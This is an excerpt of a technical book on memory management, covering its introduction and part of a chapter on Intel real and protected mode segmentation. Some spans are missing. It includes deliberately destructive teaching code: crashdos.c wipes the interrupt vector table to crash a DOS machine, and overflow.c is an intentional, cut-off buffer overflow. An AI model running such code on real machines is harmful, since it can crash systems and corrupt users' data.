Memory Management Algorithms and Implementation in C/C++
by
Bill Blunden
ISBN 1-55622-347-1
Product names mentioned are used for identification purposes only and may be trademarks of
their respective companies.
This book is dedicated to Rob, Julie, and Theo.
Table of Contents

Acknowledgments
Introduction

Memory Allocation
Case Study: Linux
    History and MINIX
    Design Goals and Features
    Linux and Segmentation
    Linux and Paging
        Three-Level Paging
        Page Fault Handling
    Memory Allocation
    Memory Usage
    Example: Siege Warfare
    Example: Siege Warfare, More Treachery
Case Study: Windows
    Historical Forces
    Memory Map Overview
    Windows and Segmentation
        Special Weapons and Tactics
        Crashing Windows with a Keystroke
        Reverse Engineering the GDT
    Windows and Paging
        Linear Address Space Taxonomy
        Musical Chairs for Pages
        Memory Protection
        Demand Paging
    Memory Allocation
    Memory Usage
    Turning Off Paging
    Example: Things That Go Thunk in the Night
Closing Thoughts
References
    Books and Articles
    Web Sites

Tests
Trade-Offs
malloc() Version 2: Sequential Fit
    Theory
    Implementation
        memmgr.cpp
        mallocV2.cpp
        driver.cpp
    Tests
    Trade-Offs
malloc() Version 3: Segregated Lists
    Theory
    Implementation
        memmgr.cpp
        mallocV3.cpp
    Tests
    Trade-Offs
Performance Comparison

Index
Introduction
Historical Setting
In the late 1930s, a group of scholars arrived at Bletchley Park in an
attempt to break the Nazis’ famous Enigma cipher. This group of
codebreakers included a number of notable thinkers, like Tommy
Flowers and Alan Turing. As a result of the effort to crack Enigma,
the first electronic computer was constructed in 1943. It was named
Colossus and used thermionic valves (known today as vacuum tubes)
for storing data. Other vacuum tube computers followed. For exam-
ple, ENIAC (electronic numerical integrator and computer) was
built by the U.S. Army in 1945 to compute ballistic firing tables.
ASIDE
“After 45 minutes or so, we’ll see that the results are
obvious.”
— David M. Lee
I have heard Nobel laureates in physics, like Dave Lee,
complain that students who rely too heavily on calculators
lose their mathematical intuition. To an extent, Dave is cor-
rect. Before the dawn of calculators, errors were more com-
mon, and developing a feel for numeric techniques was a
useful way to help catch errors when they occurred.
During the Los Alamos project, a scientist named Dick
Feynman ran a massive human computer. He once mentioned
that the performance and accuracy of his group’s computa-
tions were often more a function of his ability to motivate
people. He would sometimes assemble people into teams
and have them compete against each other. Not only was
this a good idea from the standpoint of making things more
interesting, but it was also an effective technique for catching
discrepancies.
In 1958, the first integrated circuit was invented. The inventor was
a fellow named Jack Kilby, who was hanging out in the basement of
Texas Instruments one summer while everyone else was on vaca-
tion. A little over a decade later, in 1969, Intel came out with a 1
kilobit memory chip. After that, things really took off. By 1999, I
was working on a Windows NT 4.0 workstation (service pack 3) that
had 2GB of SDRAM memory.
The general trend you should be able to glean from the previous
discussion is that memory components have kept pace with performance
demands by getting smaller, faster, and cheaper. The hardware
people have been able to have their cake and eat it too. However,
the laws of physics place a limit on how small and how fast we can
actually make electronic components. Eventually, nature itself will
stand in the way of advancement. Heisenberg’s Uncertainty Princi-
ple, shown below, is what prevents us from building infinitely small
components.
Δx · Δp ≥ h/(4π)

For those who are math-phobic, I will use Heisenberg's own words
to describe what this equation means:
“The more precisely the position is determined, the less pre-
cisely the momentum is known in this instant, and vice versa.”
In other words, if you know exactly where a particle is, then you
will not be able to contain it because its momentum will be huge.
Think of this like trying to catch a tomato seed. Every time you try
to squeeze down and catch it, the seed shoots out of your hands and
flies across the dinner table into Uncle Don’s face.
Einstein’s Special Theory of Relativity is what keeps us from
building infinitely fast components. With the exception of black
holes, the speed limit in this universe is 3x10^8 meters per second.
Eventually, these two physical limits are going to creep up on us.
When this happens, the hardware industry will have to either
make larger chips (in an effort to fit more transistors on a single die)
or use more efficient algorithms so that they can make better use of
existing space. My guess is that relying on better algorithms will be
the cheaper option. This is particularly true with regard to memory
management. Memory manipulation is so frequent and crucial to
performance that designing better memory management subsys-
tems will take center stage in the future. This will make the time
spent reading this book a good investment.
Impartial Analysis
In this book, I try very hard to offer memory management solutions
without taking sides. I have gone to great lengths to present an
unbiased discussion. This is important because it is extremely
tempting to champion a certain memory management algorithm
(especially if you invented it). There are some journal authors who
would have you believe that their new algorithm is a panacea to
cure the ills of the world. I do not have the ulterior motives of a col-
lege professor. I am here to offer you a set of tools and then let you
decide how best to use them. In this book, I will present you with
different techniques and try to point out the circumstances in which
they perform well.
The question “Which is the best memory management algo-
rithm?” is very similar in spirit to any of the following questions:
“Which operating system is the best?”
“Which programming language is the best?”
“Which data structure is the best?”
“Which type of screwdriver is the best?”
I can recall asking a program manager at Eaton Corp., John
Schindler, what the best operating system was. John was managing
at least a dozen different high-end platforms for Eaton, and I
thought he would know. I was expecting him to come right back
with a quick answer like: “Oh, OpenBSD is the best.” What actually
happened was something that surprised me. He looked at me for a
minute, as if the question was absurd. Then he smiled and said,
“Well, it really depends on what you’re going to use the machine for.
I use Solaris for networking, HP-UX for app servers, AIX to talk to
our mainframe, NT for mail, . . . ”
The truth is there is no “best” solution. Most solutions merely
offer certain trade-offs. In the end, the best tool to use will depend
upon the peculiarities of the problem you are trying to solve.
This is a central theme that appears throughout the domain of
computer science. Keep it in the back of your mind, like some sort
of Buddhist mantra:
“There is no best solution, Grasshopper, only trade-offs.”
For example, linked lists and arrays can both represent a linear set
of items. With a linked list, you get easy manipulation at the
expense of speed. Adding an element to a linked list is as easy as
modifying a couple of pointers. However, to find a given list
element, you may have to traverse the entire list manually until you
find it. Conversely, with an array, you get access speed at the
expense of flexibility. Accessing an array element is as easy as add-
ing an integer to a base address, but adding and deleting array
elements requires a lot of costly shifting. If your code is not going to
do a lot of list modification, an array is the best choice. If your code
will routinely add and delete list members, a linked list is the better
choice. It all depends upon the context of the problem.
Audience
This book is directed toward professional developers and students
who are interested in discovering how memory is managed on pro-
duction systems. Specifically, engineers working on PC or
embedded operating systems may want to refresh their memory or
take a look at alternative approaches. If this is the case, then this
book will serve as a repository of algorithms and software compo-
nents that you can apply to your day-to-day issues.
Professionals who design and construct development tools will
also find this book useful. In general, development tools fall into the
class of online transaction processing (OLTP) programs. When it
comes to OLTP apps, pure speed is the name of the game. As such,
programming language tools, like compilers, often make use of
suballocators to speed up the performance of the code that manipu-
lates their symbol table.
With regard to compiling large software programs consisting of
millions of lines of code, this type of suballocator-based optimization
can mean the difference between waiting for a few minutes and
waiting for a few hours. Anyone who mucks around with
suballocators will find this book indispensable.
Software engineers who work with virtual machines will also be
interested in the topics that I cover. The Java virtual machine is
famous for its garbage collection facilities. In this book I explore
several automatic memory management techniques and also pro-
vide a couple of concrete garbage collection implementations in
C++.
Finally, this book also targets the curious. There is absolutely
nothing wrong with being curious. In fact, I would encourage it. You
may be an application developer who has used memory manage-
ment facilities countless times in the past without taking the time to
determine how they really work. You may also have nurtured an
interest that you have had to repress due to deadlines and other pri-
orities. This book will offer such engineers an opportunity to
indulge their desire to see what is going on under the hood.
Organization
This book is divided into six chapters. I will start from the ground
up and try to provide a comprehensive, detailed view of mem-
ory management fundamentals. Because of this, each chapter builds
on what has been presented in the previous one. Unless you are a
memory management expert, the best way to read this book is
straight through.
operating system that took advantage of all four layers. All the sys-
tems that I examined use a vastly simplified two-layer scheme.
Approach
When it comes to learning something complicated, like memory
management, I believe that the most effective way is to examine a
working subsystem. On the other hand, it is easy to become lost in
the details of a production memory manager. Contemporary mem-
ory managers, like the one in Linux, are responsible for keeping
track of literally hundreds of run-time quantities. Merely tracking
the subsystem’s execution path can make one dizzy. Hence, a bal-
ance has to be struck between offering example source code that is
high quality and also easy to understand. I think I have done a suffi-
cient job of keeping the learning threshold low without sacrificing
utility.
Typographical Conventions
Words and phrases will appear in italics in this book for two reasons:

- To place emphasis
- When defining a term

The courier font will be used to indicate that text is one of the
following:

- Source code
- An address in memory
- Console input/output
- A filename or extension
Numeric values appear throughout this book in a couple of different
formats. Hexadecimal values are indicated by either prefixing them
with “0x” or appending “H” to the end.
For example:
0xFF02
0FF02H
The C code that I include will use the former notation, and the
assembler code that I include will use the latter format.
Binary values are indicated by appending the letter “B” to the
end. For example:
0110111B
Prerequisites
“C makes it easy to shoot yourself in the foot; C++ makes it
harder, but when you do, it blows away your whole leg.”
— Bjarne Stroustrup
There are certain low-level tasks, like handling hardware
interrupts, that can only be fleshed out using assembler. This is one
reason why mid-level languages, like C, provide syntactic facilities
for inline assembly code. If you look at the Linux source code, you
will see a variety of inline assembly code snippets. If at all possible,
I wrapped my assembly code in C. However, you can’t always do
this.
Learning assembly language may seem like an odious task, but
there are several tangible and significant rewards. Assembly lan-
guage is just a mnemonic representation of machine instructions.
When you have a complete understanding of a processor’s assembly
language, including its special “privileged” instructions, you will
also have a fairly solid understanding of how the machine functions
and what its limitations are. In addition, given that compilers gener-
ate assembly code, or at least spit it out in a listing file, you will also
be privy to the inner workings of development tools.
In short, knowing assembly language is like learning Latin. It
may not seem immediately useful, but it is . . . just give it time.
I used C early in the book for small applications when I felt like I
could get away with it. Most of the larger source code examples in
this book, however, are written in C++. If you don’t know C or
C++, you should pick up one of the books mentioned in the “Refer-
ences” section at the end of the Introduction. After a few weeks of
cramming, you should be able to follow my source code examples.
I think C++ is an effective language for implementing memory
management algorithms because it offers a mixture of tools. With
C++, you can manipulate memory at a very low, bit-wise level and
invoke inline assembly code when needed. You can also create
high-level constructs using the object-oriented language features in
C++. Encapsulation, in particular, is a compiler-enforced language
feature that is crucial for maintaining large software projects.
NOTE At times, you may notice that I mix C libraries and conven-
tions into my C++ source code. I do this, most often, for reasons
related to performance. For example, I think that C’s printf() is
much more efficient than cout.
Companion Files
Software engineering is like baseball. The only way you will ever
acquire any degree of skill is to practice and scrimmage whenever
you get the chance. To this end, I have included the source code for
most of the examples in this book in a downloadable file available at
www.wordware.com/memory.
Dick Feynman, who was awarded the Nobel Prize in physics in
1965, believed that the key to discovery and insight was playful
experimentation. Dick was the kind of guy who followed his own
advice. In his memoir, Surely You’re Joking, Mr. Feynman, Dick
recounts how spinning plates in a dining hall at Cornell led to his-
toric work in quantum mechanics. By testing a variety of new ideas
and comparing the results to your predictions, you force yourself to
sharpen your understanding of what is really going on.
References
Brey, Barry. The Intel Microprocessors: 8086/8088, 80186, 80286,
80386, 80486, Pentium, Pentium Pro, and Pentium II. 2000,
Prentice Hall, ISBN: 0-13-995408-2.
This is a fairly recent book and should take care of any ques-
tions you may have. Barry has been writing about Intel chips
since the first one came out.
Kernighan, Brian and Dennis Ritchie. The C Programming Lan-
guage. 1988, Prentice Hall, ISBN: 0131103628.
This is a terse but widely read introduction to C by the founding
fathers of the language.
Reid, T. R. The Chip: How Two Americans Invented the Microchip
and Launched a Revolution. 2001, Random House, ISBN:
0375758283.
Schildt, Herbert. C++ From the Ground Up. 1998, Osborne
McGraw-Hill, ISBN: 0078824052.
If you have never programmed in C/C++, read this book. It is
a gentle introduction written by an author who knows how to
explain complicated material. Herb starts by teaching you C and
then slowly introducing the object-oriented features of C++.
Stroustrup, Bjarne and Margaret Ellis. The Annotated C++ Refer-
ence. 1990, Addison-Wesley, ISBN: 0201514591.
Once you have read Schildt’s book, you can use this text to fill
in the gaps. This book is exactly what it says it is — a reference
— and it is a good one.
Warning
In this book I provide some rather intricate, and potentially danger-
ous, source code examples. This is what happens when you go
where you are not particularly supposed to be. I recommend that
you use an expendable test machine to serve as a laboratory. Also,
you might want to consider closing all unnecessary applications
before experimenting. If an application dies in the middle of an
access to disk, you could be faced with a corrupt file system.
If you keep valuable data on the machine you are going to use, I
suggest you implement a disaster recovery plan. During the writing
of this book’s manuscript, I made a point to perform daily incremen-
tal backups and complete weekly backups of my hard drive. I also
had a secondary machine that mirrored my primary box. Large cor-
porations, like banks and insurance companies, have truly extensive
emergency plans. I toured a production site in Cleveland that had
two diesel fuel generators and a thousand gallons of gas to provide
backup power.
Neither the publisher nor the author accepts any responsibility for
any damage that may occur as a result of the information contained
within this book. As Stan Lee might say, “With great power comes
great responsibility.”
Author Information
Bill Blunden has been obsessed with systems software since his
first exposure to the DOS debug utility in 1983. His single-minded
pursuit to discover what actually goes on under the hood led him to
program the 8259 interrupt controller and become an honorable
member of the triple-fault club. After obtaining a BA in mathemati-
cal physics and an MS in operations research, Bill was unleashed
upon the workplace. It was at an insurance company in the beautiful
city of Cleveland, plying his skills as an actuary, that Bill got into his
first fist fight with a cranky IBM mainframe. Bloody but not beaten,
Bill decided that grokking software beat crunching numbers. This led
him to a major ERP player in the midwest, where he developed
CASE tools in Java, wrestled with COBOL middleware, and was
assailed by various Control Data veterans. Having a quad-processor
machine with 2GB of RAM at his disposal, Bill was hard pressed to
find any sort of reason to abandon his ivory tower. Nevertheless, the
birth of his nephew forced him to make a pilgrimage out west to Sil-
icon Valley. Currently on the peninsula, Bill survives rolling power
blackouts and earthquakes, and is slowly recovering from his initial
bout with COBOL.
Chapter 1
Memory Management Mechanisms
“Everyone has a photographic memory. Some people just don’t
have film.”
— Mel Brooks
ASIDE
An arm-waving explanation is a proposition that has not been
established using precise mathematical statements. Mathe-
matical statements have the benefit of being completely un-
ambiguous: They are either true or false. An arm-waving
explanation tends to eschew logical rigor entirely in favor of
arguments that appeal to intuition. Such reasoning is at best
dubious, not only because intuition can often be incorrect, but
also because intuitive arguments are ambiguous. For example,
people who argue that the world is flat tend to rely on arm-
waving explanations.
NOTE Back when Dave Cutler’s brainchild, Windows NT, came out,
there was a lot of attention given to the operating system’s Hardware
Abstraction Layer (HAL). The idea was that the majority of the operat-
ing system could be insulated from the hardware that it ran on by a
layer of code located in the basement. This was instituted to help
counter the hardware dependency issue that I mentioned a minute
ago. To Dave’s credit, NT actually did run on a couple of traditionally
UNIX-oriented hardware platforms. This included Digital’s Alpha pro-
cessor and the MIPS RISC processor. The problem was that Microsoft
couldn’t get a number of its higher-level technologies, like DCOM, to
a binary standard!
The solution that favors speed always wins. I was told by a former
Control Data engineer that when Seymour Cray was designing the
6600, he happened upon a new chip that was quicker than the one
he was currently using. The problem was that it made occasional
computational errors. Seymour implemented a few slick work-
arounds and went with the new chip. The execs wanted to stay out
of Seymour’s way and not disturb the maestro, as Seymour was
probably the most valuable employee Control Data had. Unfortu-
nately, they also had warehouses full of the original chips. They
couldn’t just throw out the old chips; they had to find a use for them.
This problem gave birth to the CDC 3300, a slower and less expen-
sive version of the 6600.
My point: Seymour went for the faster chip, even though it was
less reliable.
Speed rules.
The result of this tendency is that every commercial operating
system in existence has its memory management services firmly
rooted in data structures and protocols dictated by the hardware.
Processors provide a collection of primitives for manipulating mem-
ory. They constitute the mechanism side of the equation. It is up to
the operating system to decide if it will even use a processor’s
memory management mechanisms and, if so, how it will use them.
Operating systems constitute the policy side of the equation.
In this chapter, I will examine computer hardware in terms of
how it offers a mechanism to access and manipulate memory.
Memory Hierarchy
When someone uses the term “memory,” they are typically refer-
ring to the data storage provided by dedicated chips located on the
motherboard. The storage these chips provide is often referred to
as Random Access Memory (RAM), main memory, and primary stor-
age. Back in the iron age, when mainframes walked the earth, it was
called the core. The storage provided by these chips is volatile,
which is to say that data in the chips is lost when the power is
switched off.
There are various types of RAM:

- DRAM
- SDRAM
- SRAM
- VRAM
Dynamic RAM (DRAM) has to be recharged thousands of times
each second. Synchronous DRAM (SDRAM) is synchronized with the
system clock so that transfers keep pace with the processor bus. Static
RAM (SRAM) does not need to be refreshed like DRAM, and this
makes it much faster. Unfortunately, SRAM is also much more
expensive than DRAM and is used sparingly. SRAM tends to be
used in processor caches and DRAM tends to be used for wholesale
memory. Finally, there’s Video RAM (VRAM), which is a region of
memory used by video hardware. In the next chapter, there is an
example that demonstrates how to produce screen messages by
manipulating VRAM.
Recent advances in technology and special optimizations imple-
mented by certain manufacturers have led to a number of additional
acronyms. Here are a couple of them:

- DDR SDRAM
- RDRAM
- ESDRAM
DDR SDRAM stands for Double Data Rate Synchronous Dynamic
Random Access Memory. With DDR SDRAM, data is read on both
the rising and the falling edges of the system clock, basically doubling
the bandwidth normally available. RDRAM is short for Rambus
DRAM, a high-performance version of DRAM sold by Rambus that
can transfer data at 800 MHz. Enhanced Synchronous DRAM
(ESDRAM), manufactured by Enhanced Memory Systems, provides
a way to replace SRAM with cheaper SDRAM.
A bit is a single binary digit (i.e., a 1 or a 0). A bit in a RAM chip
is basically a cell structure that is made up of, depending on the type
of RAM, a certain configuration of transistors and capacitors. Each
cell is a digital switch that can either be on or off (i.e., 1 or 0). These
cells are grouped into 8-bit units called bytes. The byte is the funda-
mental unit for measuring the amount of memory provided by a
storage device. In the early years, hardware vendors used to imple-
ment different byte sizes. One vendor would use a 6-bit byte and
another would use a 16-bit byte. The de facto standard that every-
one seems to abide by today, however, is the 8-bit byte.
There is a whole set of byte-based metrics to specify the size of a
memory region:
1 byte = 8 bits
1 word = 2 bytes
1 double word = 4 bytes
1 octal word = 8 bytes
1 paragraph = 16 bytes
1 kilobyte (KB) = 1,024 bytes
1 megabyte (MB) = 1,024KB = 1,048,576 bytes
1 gigabyte (GB) = 1,024MB = 1,073,741,824 bytes
1 terabyte (TB) = 1,024GB = 1,099,511,627,776 bytes
1 petabyte (PB) = 1,024TB = 1,125,899,906,842,624 bytes
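These powers of two are easy to verify with a few shifts. This is a
throwaway sketch of my own, not part of the book's code:

#include <stdio.h>

int main(void)
{
    /* each step up the table multiplies the previous unit by 2^10 */
    unsigned long long kb = 1ULL << 10;
    unsigned long long mb = 1ULL << 20;
    unsigned long long gb = 1ULL << 30;

    printf("KB=%llu MB=%llu GB=%llu\n", kb, mb, gb);
    return 0;
}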
Figure 1.1

Figure 1.2
NOTE A recurring point that I will make throughout this book is the
high cost of disk input/output. As I mentioned previously, the latency
for accessing disk storage is on the order of milliseconds. This is a long
time from the perspective of a processor. The situation is analogous to
making a pizza run from a remote cabin in North Dakota. If you are
lucky, you have a frozen pizza in your freezer/cache and it will only
take 30 minutes to heat up. If you are not lucky, you will have to call
the pizza delivery guy (i.e., access the data from disk storage) and wait
for five hours as he makes the 150-mile trek to your cabin.
Using virtual memory is like making a deal with the devil. Sure, you
will get lots of extra memory, but you will pay an awful cost in terms
of performance. Disk I/O involves a whole series of mandatory
actions, some of which are mechanical. It is estimated that paging
on Windows accounts for roughly 10% of execution time. Managing
virtual memory requires a lot of bookkeeping on the part of the pro-
cessor. I will discuss the precise nature of this bookkeeping in a
later section.
ASIDE
I worked at an ERP company where one of the VPs used to
fine engineers for performing superfluous disk I/O. During
code reviews, he would grep through source code looking for
the fopen() and fread() standard library functions. We
were taught the basic lesson that you cached everything you
possibly could in memory and only moved to disk storage
when you absolutely had no other alternative (and even then
you needed permission). To the VP’s credit, the company’s
three-tier middleware suite was the fastest in the industry.
Disk storage has always been cheaper than RAM. Back in the 1960s
when 8KB of RAM was a big investment, using the disk to create
virtual memory probably made sense. Today, however, the cost dis-
crepancy between DRAM and disk drives is not as significant as it
was back then. Buying a machine with 512MB of SDRAM is not
unheard of. It could be that virtual memory will become a complete
relic or be relegated to the role of an emergency safeguard.
Each byte in DRAM is assigned a unique numeric identifier called
an address, just like houses on a street. An address is an integer
value. The first byte in memory is assigned an address of zero. The
region of memory near address zero is known as the bottom of mem-
ory, or low memory. The region of memory near the final byte is
known as high memory. The number of physical (i.e., DRAM) bytes
that a processor is capable of addressing is known as the processor’s
physical address space. (See Figure 1.3.)
Figure 1.3
Figure 1.4
When the processor reads from memory, the following steps are
performed:
1. The processor places the address of the byte to be read on the
address lines.
2. The processor sends the read signal on the control bus.
3. The DRAM chip(s) return the byte specified on the data bus.
When the processor writes to memory, the following steps are
performed:
1. The processor places the address of the byte to be written on
the address lines.
2. The processor sends the write signal on the control bus.
3. The processor sends the byte to be written to memory on the
data bus.
This description is somewhat of an oversimplification. For example,
the Pentium processor reads and writes data 4 bytes at a time. This
is one reason why the Pentium is called a 32-bit chip. The processor
will refer to its 32-bit payload using the address of the first byte
(i.e., the byte with the lowest address). Nevertheless, I think the
general operation is clear.
You have seen how a processor reads and writes bytes to memory.
However, most processors also support two advanced memory man-
agement mechanisms: segmentation and paging.
Segmentation is instituted by breaking up a computer’s address
space into specific regions, known as segments. Using segmentation
is a way to isolate areas of memory so that programs cannot inter-
fere with one another. Segmentation affords what is known as
memory protection. It is possible to institute memory segmentation
without protection, but there are really no advantages to such a
scheme.
Under a segmentation scheme that enforces memory protection,
each application is assigned at least one segment. Large applications
often have several segments. In addition, the operating system will
also have its own custom set of segments. Segments are assigned a
specific set of access rights so that policies can be created with
regard to who can update what. Typically, the operating system code
segments will execute with the highest privilege and applications
will be loaded into segments with less authority.
Figure 1.5
The catch to all this is that the address of a byte in this artifi-
cial/virtual address space is no longer the same as the address that
the processor places on the address bus. This means that transla-
tion data structures and code will have to be established in order to
map a byte in the virtual address space to a physical byte (regard-
less of whether that byte happens to be in DRAM or on disk).
When the necessary paging constructs have been activated, the
virtual memory space is divided into smaller regions called pages. If
the operating system decides that it is running low on physical
memory, it will take pages that are currently stored in physical
memory and write them to disk. If segmentation is being used,
bookkeeping will have to be performed in order to match a given
page of memory with the segment that owns it. All of the account-
ing work is done in close conjunction with the processor so that the
performance hit associated with disk I/O can be kept to a minimum.
Figure 1.6

I decided to use the Pentium to help illustrate segmentation and
paging. I would love to demonstrate theory with a MIPS64 processor,
but I can’t afford an SGI server (sigh). Being inexpensive is one of
the primary reasons for Intel’s continued success. Hackers, like me,
who couldn’t afford an Apple IIe back in the 1980s were left
scrounging for second-hand Intel boxes. There were thousands of
people who had to make this kind of financial decision. So, in a
sense, the proliferation of Intel into the workplace was somewhat of
a grass roots movement.
The Pentium class of processors is descended from a long line of
popular CPUs:
CPU           Release Date    Physical Address Space
8086          1978            1MB
8088          1979            1MB
80286         1982            16MB
80386         1985            4GB
80486         1989            4GB
Pentium       1993            4GB
Pentium Pro   1995            64GB
Pentium II    1997            64GB
Pentium III   1999            64GB
Pentium 4     2000            64GB
NOTE When the IBM PC came out in 1981, it shipped with a 4.77
MHz 8088. Without a doubt, mainframe developers were overjoyed.
This was because the PC gave them a place of their own. In those
days, the standard dummy terminals didn’t do anything more than
shuttle a data buffer back and forth to a mainframe. In addition, an
engineer had little or no control over when, or how, his code would be
run. The waiting could be agonizing. Tom Petty was right. Bribing a
sysop with pizza could occasionally speed things up, but the full court
grovel got tiring after a while. With an IBM PC, an engineer finally had
a build machine that was open all night with no waiting.
ASIDE
I know one CDC engineer, in particular, who ported a FOR-
TRAN ’77 compiler to a PC in 1982 for this very reason. His
supervisor would walk over and say: “Why do you want to run
on that little three-wheeler instead of the production ma-
chine?” His answer: “Because it is mine, damn it.” This one
statement probably summarizes the mindset that made PCs
wildly successful.
The real mode register set is displayed in Figure 1.7.
Figure 1.7
As you can see, the “E” prefix has been removed from the regis-
ter names. In addition, each of the 16-bit general registers, AX, BX,
CX, and DX, can be manipulated in terms of two 8-bit registers. For
example, the AX register can be seen as the combination of the AH
and AL registers. The AH register refers to the high byte in AX,
and the AL register refers to the low byte in AX.
NOTE The memory and mode registers shown in Figure 1.2 are still
visible in real mode. They still exist if the processor is a 32-bit class
CPU but they have no significance or use in real mode. The only
exception to this rule is if you are trying to switch to protected mode.
Sometimes, for reasons that I will explain later, this is also written
as:
0x8200[0]:0x0100
Figure 1.8
NOTE The fact that there are six segment registers means that at
any time, only six segments of memory can be manipulated. A pro-
gram can have more than six segments, but only six can be accessible
at any one point in time.
In real mode, segment addresses and offset addresses are both 16
bits in size. Given that an offset address is 16 bits, this limits each
segment to 64KB in size.
QUESTION
If the segment address and offset address are both stored in
16-bit registers, how can the sum of two 16-bit values form a
20-bit value?
ANSWER
The trick is that the segment address has an implicit zero
added to the end. For example, a segment address of 0x0C00 is
treated as 0x0C000 by the processor. This is denoted, in practice,
by placing the implied zero in brackets (i.e., 0x0C00[0]). This is
where the processor comes up with a 20-bit value.
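Here is a minimal sketch of this computation in C (realAddr() is a
hypothetical helper of my own, not something from the book's source):

/* form a 20-bit real mode physical address from a segment:offset pair */
unsigned long realAddr(unsigned short segment, unsigned short offset)
{
    /* shifting left by 4 bits appends the implied zero nibble */
    return ((unsigned long)segment << 4) + (unsigned long)offset;
}

For example, realAddr(0x0C00, 0x0021) evaluates to 0x0C021.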
As you can see, the real mode segment/offset approach does provide
a crude sort of segmentation. However, at no point did I mention
that the boundaries between segments are protected. The ugly
truth is that there is no memory protection in real mode. When you
run a program in real mode, it owns everything and can run amok if
it wants.
Running an application in real mode is like letting a den of Cub
Scouts into your home. They’re young, spirited, and all hopped-up
on sugar. If you’re not careful, they will start tearing the house
down. Crashing a real mode machine is simple, and there is little
you can do to prevent it (other than back up your work constantly).
In case you are wondering, and I’m sure some of you are, here is
an example of a C program that can crash a computer running in real
mode:
/* --crashdos.c-- */
void main()
{
    /* far pointer to the real mode interrupt vector table at 0000[0]:0000 */
    unsigned char far *ptr = (unsigned char far *)0x0;
    int i;

    /* zero out the vector table; the next interrupt takes the machine down */
    for(i=0; i<1024; i++){ ptr[i] = 0; }
}
Intel’s processors would never have made inroads into the enter-
prise with this kind of Mickey Mouse memory management. In an
attempt to support more robust operating systems and larger
address spaces, Intel came out with the 80386. The 80386 had a
physical address space of 4GB and supported a new mode of opera-
tion: protected mode.
The best way to understand segmentation on Intel is to take a visual
look at how it is implemented. A picture is worth 1,024 words, and
that is particularly true in this case. So take a good, hard look at
Figure 1.9 and compare it to Figure 1.8. You might also want to
bookmark Figure 1.9 so that you can return to it when needed.
Figure 1.9
The first thing to note is that protected mode uses the full-blown
set of Pentium registers displayed in Figure 1.2. Back to 32-bit reg-
isters we go. Also, the segment registers no longer store 16-bit
segment address values. Instead, they hold what is known as a seg-
ment selector.
A segment selector is a 16-bit data structure containing three
fields. Its composition is displayed in Figure 1.10. The really impor-
tant field is the index field. The index field stores an index to a
descriptor table. Index values start at zero.
Figure 1.10
NOTE Almost all of the operating systems this book examines focus
on the GDT and offer very minimal use of the LDT (if they use it at all).
Figure 1.11
QUESTION
How does the processor map a segment selector’s index to a
descriptor?
ANSWER
The processor takes the index, specified by the segment
selector, multiplies the index by eight (as in 8 bytes, because
descriptors are 64 bits in length), and then adds this product to
the base address specified by GDTR or LDTR.
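In C, the calculation looks something like the following sketch (the
function name is mine):

/* linear address of descriptor i = table base + (i * 8 bytes) */
unsigned long descriptorAddr(unsigned long tableBase, unsigned int index)
{
    return tableBase + ((unsigned long)index << 3);  /* index * 8 */
}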
NOTE In case you are looking at Figure 1.2 and wondering about
the other two memory management registers, IDTR and TR, I did not
forget them. They are not as crucial to this discussion as GDTR and
LDTR. The IDTR and TR registers are used to manage hardware inter-
rupts and multitasking. This book is focused on pure memory
management, so I will not discuss these registers in any detail. If you
happen to be interested, I recommend that you pick up the Intel man-
ual referenced at the end of this chapter.
Figure 1.12
descriptor. There are two fields that might not be obvious just from
looking at Figure 1.11. First is the SS flag, which indicates whether
the segment is a system segment or just a normal code/data segment.
A system segment, in case you are scratching your head, is a seg-
ment that is used to provide interrupt handling and multitasking
services. I will not investigate either of those subjects.
NOTE You will see a number of 1-bit flags in the following few sec-
tions. For future reference, a bit is set when it is one. A bit is cleared
when it is zero. Low-level operating system code is rife with bit-based
manipulation. There is no way around it. Engineers who work with
high-level languages tend to look down on engineers who write this
type of low-level code. They are called bit-bashers or bit-twiddlers. Pro-
grammers can be cruel.
Assuming that the SS flag is set, the 4-bit type field in the
descriptor describes the specific properties of the segment:
Table 1.1

Bits 11 10 9 8    Type    Description
0    0  0  0      data    read-only
0    0  0  1      data    read-only, accessed
0    0  1  0      data    read-write
0    0  1  1      data    read-write, accessed
0    1  0  0      data    read-only, expand down
0    1  0  1      data    read-only, expand down, accessed
0    1  1  0      data    read-write, expand down
0    1  1  1      data    read-write, expand down, accessed
1    0  0  0      code    execute-only
1    0  0  1      code    execute-only, accessed
1    0  1  0      code    execute-read
1    0  1  1      code    execute-read, accessed
1    1  0  0      code    execute-only, conforming
1    1  0  1      code    execute-only, conforming, accessed
1    1  1  0      code    execute-read, conforming
1    1  1  1      code    execute-read, conforming, accessed
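Table 1.1 boils down to a few bit tests. The following decoder is a
sketch of my own, not code from the book:

#include <stdio.h>

/* print the meaning of a 4-bit descriptor type field (bits 11-8) */
void decodeType(unsigned type)
{
    if(type & 0x8)      /* bit 11 set: code segment */
    {
        printf("code, execute-%s%s%s\n",
               (type & 0x2) ? "read" : "only",
               (type & 0x4) ? ", conforming" : "",
               (type & 0x1) ? ", accessed" : "");
    }
    else                /* bit 11 clear: data segment */
    {
        printf("data, read-%s%s%s\n",
               (type & 0x2) ? "write" : "only",
               (type & 0x4) ? ", expand down" : "",
               (type & 0x1) ? ", accessed" : "");
    }
}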
Operating systems tend to exercise
caution with regard to the circumstances in which they allow oper-
ating system segments to be conforming.
QUESTION
OK, so we understand how the segments are referenced and
what kind of metadata the segment descriptors store. How are
these memory segments protected?
ANSWER
As it turns out, the segment selector and segment descriptor
contain most of the information needed to implement a protec-
tion scheme. The processor makes ample use of this metadata to
track down memory access violations.
For example, the limit field in the segment descriptor is used
to help keep memory from being referenced beyond the desig-
nated last byte of a memory segment. Also, the type field in the
segment descriptor ensures that a segment that is specified as
read-only is not written to. The privilege fields in the segment
selector and segment descriptor are used by the processor to
prevent a program from illegally executing code or data that has
a higher privilege.
Privilege levels are how the operating system prevents user appli-
cations from manipulating the kernel image and compromising
security. In the real mode discussion, you saw how easy it was to
cause havoc and crash the system. I merely waltzed over to the
interrupt vector table and erased it. In protected mode, this threat
can be dealt with. Vital data structures and operating system code
can be safeguarded at the hardware level.
Intel supports four different privilege levels (0-3). Another way
to say this is that Intel supports four rings of protection. These rings
are illustrated in Figure 1.13. This is actually a
pretty simple scheme as far as memory protection is concerned.
Decades ago when Control Data was building the NOS/VE operating
system, the architects wanted to have 15 rings of protection! The
odd thing about contemporary operating systems like Linux and
Windows is that they only implement two rings of protection (one
for the kernel and another for everything else). They don’t take full
advantage of the facilities offered by the Pentium.
Figure 1.13
/* --overflow.c-- */
#include<stdio.h>

void main()
{
    int array[4];
    int i;

    for(i=0;i<100;i++)
    {
        array[i]=i;
